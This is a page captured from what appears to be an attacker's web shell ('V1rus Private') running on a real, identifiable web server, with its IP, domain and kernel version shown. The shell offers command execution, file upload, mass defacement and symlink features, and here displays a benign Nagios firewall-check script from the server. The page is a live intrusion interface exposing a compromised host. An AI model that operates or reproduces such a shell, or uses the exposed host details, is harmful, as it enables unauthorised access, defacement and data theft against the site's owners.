V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
lib64
/
nagios
/
plugins
/
Viewing: vz7_check_a2_fw.sh
#!/bin/bash # # Firewall rules check for vz7 nodes # Refactored to add logging - BFENG-551 LOGFILE="/var/log/check_fw.log" TMPFILE=$(mktemp /tmp/check_fw.XXXXXX) _LOG() { echo -e "$(date '+%Y-%m-%d %H:%M:%S')" >> "$LOGFILE" echo "$1" | tee -a "$LOGFILE" } /sbin/iptables -S | grep -wE 'INPUT|DROP|REJECT' >> "$TMPFILE" IPT=$(cat "$TMPFILE") IDRP=$(echo "$IPT" | grep -c 'INPUT DROP') DRP=$(echo "$IPT" | grep -c DROP) REJ=$(echo "$IPT" | grep -c REJECT) if [ "$IDRP" -eq 0 ]; then _LOG "check_fw - Iptables firewall has no default DROP policy!" cat "$TMPFILE" >> "$LOGFILE" rm "$TMPFILE" exit 2 elif [ "$DRP" -eq 0 ] && [ "$REJ" -eq 0 ]; then _LOG "check_fw - Iptables firewall DROP/REJECT rules are missing!" cat "$TMPFILE" >> "$LOGFILE" rm "$TMPFILE" exit 2 fi /sbin/iptables -nvL | grep 'Chain' | awk '{print $2}' > "$TMPFILE" CHAINS=$(cat "$TMPFILE") for CHAIN in $CHAINS; do if [ "$CHAIN" != "FORWARD" ] && [ "${CHAIN:0:6}" != "OUTPUT" ] && [ "${CHAIN:0:4}" != "LOG_" ] && [ "${CHAIN:0:5}" != "SOLUS" ] && [[ ! $CHAIN =~ "LIBVIRT" ]]; then CNT=$(expr "$(/sbin/iptables -S "$CHAIN" | wc -l)" '-' 1) if [ "$CNT" -eq 0 ]; then _LOG "check_fw - Iptables firewall rules are missing!" cat "$TMPFILE" >> "$LOGFILE" rm "$TMPFILE" exit 2 else echo "check_fw - Iptables firewall is OK" rm "$TMPFILE" exit 0 fi fi done
Coded With 💗 by
HanzOFC